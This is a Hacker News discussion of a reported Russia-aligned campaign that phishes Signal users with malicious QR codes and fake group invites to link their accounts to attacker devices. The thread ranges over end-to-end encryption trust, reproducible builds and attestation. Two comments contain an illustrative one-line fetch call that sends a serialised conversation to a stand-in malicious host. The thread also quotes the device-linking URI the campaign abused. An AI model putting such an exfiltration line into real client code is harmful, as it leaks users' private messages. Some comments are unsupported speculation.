
Multiple Russia-aligned threat actors actively targeting Signal Messenger

836 points | karel-3d | 1 year ago | cloud.google.com

289 comments

[+] vetrom|1 year ago|reply
Signal (and basically any app) with a linked-devices workflow has been risky for a while now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash-talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

It certainly doesn't help that Signal themselves have discounted this attack (quoted from the IACR eprint paper):

    "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
[+] diputsmonro|1 year ago|reply
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.

Thus, carrying out this attack would seem to require hardware access to one of the victim's devices (or some other backdoor), in which case you've already lost.

Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.

[+] inor0gu|1 year ago|reply
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.

Outside of lab settings, the only ways to do that are:
- (1) you get root access to the user's device
- (2) you compromise a recent chat backup

The campaign Google found is akin to phishing, so it's not as problematic on a technical level. How to warn someone they might be doing something dangerous is an entire can of worms in usable security... and it's going to become even more relevant for Signal once adding a new linked device also copies your message history (and the last 45 days of attachments).

[+] tomrod|1 year ago|reply
If one doesn't use the linked-device feature, does that reduce this threat surface?
[+] parhamn|1 year ago|reply
One thing I'm realizing more and more (I've been building an encrypted AI chat service powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. At the end of the day, you can put a one-line fetch/analytics-tracker/etc. on the rendering side and everything your protocol claimed to do becomes useless. That goes even further, down to the OS the rendering is done on.

The last bit adds an interesting facet: even if you manage to open-source the client and make it verifiably buildable by the user, you still need to distribute it through the iOS App Store. Anything can happen in the publish process. I use iOS as the example because it's particularly tricky to load your own build of an application.

And even if you did that, you still need to do it all on the other side of the chat too, assuming it's a multi-party chat.

You can have every cute protocol known to man, the best encryption algorithms on the wire, etc., but at the end of the day it's all trust.

I mention this because these days I worry more that using something like Signal actually makes you a target for snooping, under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop, I'd focus my resources on Signal users; they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
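The one-liner in this comment can be made concrete. A minimal sketch of the point, with hypothetical type and function names, and the exfiltration call deliberately left commented out: whatever the wire protocol guarantees, the rendering layer sees plaintext.

```typescript
// Sketch of the point above: the rendering layer necessarily handles
// plaintext, so one extra line there defeats any wire-level E2EE.
// All names here are hypothetical.
type Conversation = { participants: string[]; messages: string[] };

// What the UI layer legitimately needs: decrypted text to display.
function render(convo: Conversation): string {
  return convo.messages.join("\n");
}

// The same layer, with one added (here commented-out) line that would
// silently ship the plaintext to a third party:
function renderCompromised(convo: Conversation): string {
  // fetch("https://malvevolentactor.com", { method: "POST", body: JSON.stringify(convo) });
  return render(convo);
}
```

No audit of the protocol layer would catch this; only inspection of the client build that actually runs.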

[+] inor0gu|1 year ago|reply
You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicon, through the OS, all the way to how packets are forwarded from you to the person on the other end.

That makes the entire goal moot: eliminating trust seems impossible; you're just shifting around the things you're willing to trust, or hiding them behind an abstraction.

I think what will become more important is to have enough mechanisms to be able to categorically prove that an entity you trust to a certain extent is acting maliciously, and hold it accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a loud enough loudspeaker to voice distrust.

A few examples:
- certificate transparency logs, so your traffic is not MitM'ed
- reproducible builds, so the binary you get matches the public open-source code you expect it to (regardless of its quality)
- key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
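The reproducible-builds item above boils down to a digest comparison. A toy sketch under stated assumptions (function names are mine; real verification hashes the distributed binary against one you rebuilt independently from the published source):

```typescript
import { createHash } from "node:crypto";

// Toy illustration of the reproducible-builds idea: two independently
// produced artifacts from the same source should be byte-identical,
// so their SHA-256 digests must match.
function digest(artifact: Uint8Array): string {
  return createHash("sha256").update(artifact).digest("hex");
}

function buildsMatch(myBuild: Uint8Array, publishedBuild: Uint8Array): boolean {
  return digest(myBuild) === digest(publishedBuild);
}
```

A mismatch doesn't tell you *what* differs, only that the vendor's binary is not what the public source produces, which is exactly the loudspeaker the comment asks for.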

[+] BrenBarn|1 year ago|reply
I agree with you that the cart is getting ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that try to be too secure will prevent users from reading their own messages, and hence will push those users toward "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently lost messages.)

There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

[+] lmm|1 year ago|reply
> Sometimes it all feels pointless

Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.

[+] redleader55|1 year ago|reply
I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust, that confirms beyond doubt the provenance of the entity (phone + OS + app) that you interact with.

Android has that and can confirm to a third party that the phone is running, for example, a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + LineageOS (as an example) as "original" software.

The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

A fully transparent attested artifact, one that doesn't involve blind trust in an entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of a signature-based root of trust.

All of the above is technically possible, but not implemented today in a way that makes this feasible. I'm confident that with enough interest it will eventually be implemented.
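The ledger idea in this comment reduces to a membership check: instead of verifying a vendor signature, the verifier asks whether each attested component hash appears in a public append-only log. A sketch with hypothetical structures (a real transparency log would also require Merkle inclusion proofs, not a bare lookup):

```typescript
// Hypothetical attestation claim: hex hashes of each component
// in the chain the remote party wants to verify.
type Attestation = { bootloader: string; os: string; app: string };

// A real ledger would be an append-only transparency log with
// inclusion proofs; a Set of known-good hashes stands in for it here.
function attested(claim: Attestation, publicLedger: Set<string>): boolean {
  return [claim.bootloader, claim.os, claim.app].every((h) => publicLedger.has(h));
}
```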

[+] MediumOwl|1 year ago|reply
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

I think your comment in general, and this part in particular, forgets the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on public wifi was playing Russian roulette, and signals intelligence agencies were having the time of their lives.

The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

[+] solarkraft|1 year ago|reply
> "E2E encryption" really requires the client to be built and verified by the end user

We probably agree that this is infeasible for the vast majority of people.

Luckily reproducible builds somewhat sidestep this in a more practical way.

[+] edgineer|1 year ago|reply
I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

[0] https://github.com/maqp/tfc

[+] aembleton|1 year ago|reply
> "E2E encryption" really requires the client to be built and verified by the end user

But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.

At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

[+] SheinhardtWigCo|1 year ago|reply
It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

[+] untech|1 year ago|reply
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
[+] forkerenok|1 year ago|reply
The article says they phish people into linking adversarial devices to their Signal:

> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]

[+] mmooss|1 year ago|reply
Is this serious?

It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (one they already know how to use, without additional training).

The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me; I would expect someone is working on securing them well enough that even Russian intelligence doesn't have an effective exploit.

The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.

[+] andreygrehov|1 year ago|reply
Soldiers are not allowed to carry a cell phone.
[+] BrenBarn|1 year ago|reply
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
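The gate this comment proposes amounts to classifying the scanned payload and never acting on a device-link URI without an explicit confirmation step. A sketch assuming the "sgnl://linkdevice?uuid=" scheme quoted in the article (the group-invite prefix and both function names are my assumptions):

```typescript
// Classify a scanned QR payload. The "sgnl://linkdevice?" prefix is
// quoted in the article; the group-invite prefix is an assumption.
function classifyScannedUri(uri: string): "link-device" | "group-invite" | "unknown" {
  if (uri.startsWith("sgnl://linkdevice?")) return "link-device";
  if (uri.startsWith("https://signal.group/")) return "group-invite";
  return "unknown";
}

// The point of the comment: scanning must only produce an intent;
// linking a device requires a separate, explicit confirmation dialog.
function shouldPromptExplicitConfirmation(uri: string): boolean {
  return classifyScannedUri(uri) === "link-device";
}
```

With such a gate, a victim who thought they were scanning a group invite would see a "link this device?" prompt instead of a silent link, which is exactly the mismatch the comment wants surfaced.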
[+] mmooss|1 year ago|reply
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)

Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.

Do you have reason to think there is no confirmation? Maybe Signal's documentation will tell you.

[+] 1970-01-01|1 year ago|reply
The good news is the target is targeted for a reason: it's still effective.
[+] josh2600|1 year ago|reply
There are many voices which try to tell you that Signal is compromised. Notice that in virtually all cases, those voices have less open-source-ness than Signal.

Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.

This is not a simple conversation.

[+] sunshine-o|1 year ago|reply
> There are many voices which try to tell you that signal is compromised.

But compromised by whom? Russian or US intelligence? I am really confused.

I just looked quickly at the Signal Foundation website and its board members, and I read things like:

> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.

> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board

> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.

Those types of people sound like part of the intelligence world to me. What exactly are they doing on the board of Signal (an open-source messaging app)?

> This is not a simple conversation.

I agree

[+] SXX|1 year ago|reply
And Telegram is specifically bad here: it uses custom crypto on a custom protocol, doesn't have any E2EE by default whatsoever, and stores everything on the server in plain text.
[+] mmooss|1 year ago|reply
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.

I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.

[+] moffkalast|1 year ago|reply
> web scale

I didn't realize anyone still used that term with a straight face.

"MongoDB is web scale, you turn it on and it scales right up."

[+] anotherhue|1 year ago|reply
You can check for unexpected linked devices in the settings menu.
[+] jzb|1 year ago|reply
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
[+] seb1204|1 year ago|reply
Great idea, I'll send you a QR code...
[+] andreygrehov|1 year ago|reply
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.

Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

[+] dtquad|1 year ago|reply
>signal-confirm[.]site is registered in Ukraine

WHOIS records are usually fake, made-up data, so I don't know why you are using that to claim the domain is registered in Ukraine. Russia is also known to use stolen credentials, SIM cards, etc. from its neighbouring countries, including Ukraine, for things like this.

[+] WesolyKubeczek|1 year ago|reply
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.

Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.

[+] nightpool|1 year ago|reply
An unregistered domain can still be an IoC, especially when found through, e.g., payload analysis.
[+] XorNot|1 year ago|reply
[flagged]
[+] evilfred|1 year ago|reply
"Russia-aligned threat"... so... the US?
[+] advisedwang|1 year ago|reply
Kind of a good sign for signal's security that this is the best Russia has got!
[+] aembleton|1 year ago|reply
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Missing from their recommendations: install NoScript: https://noscript.net/

[+] cassepipe|1 year ago|reply
NoScript is a browser extension. Signal is an Android/iOS/Electron app, so no.
[+] lifeinthevoid|1 year ago|reply
They should add an option to not allow linking additional devices, if that’s feasible.
[+] aussieguy1234|1 year ago|reply
Phone verification is a common method used here.

If, somehow, the victim's phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victim's account on a new device.

It's very easily done if the victim is located in an authoritarian country like Russia or Iran; they can simply force the local phone provider to cooperate.

[+] gck1|1 year ago|reply
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

Ironic, coming from Google, as Android is THE one OS where using alphanumeric passwords is nearly impossible: Android limits password length to an arbitrary 16 characters, preventing the use of passphrases.

[+] mppm|1 year ago|reply
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
[+] sharpshadow|1 year ago|reply
“Russia's re-invasion of Ukraine”

Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?

[+] cassepipe|1 year ago|reply
Invasion of Crimea 2014

Re-invasion in February 2022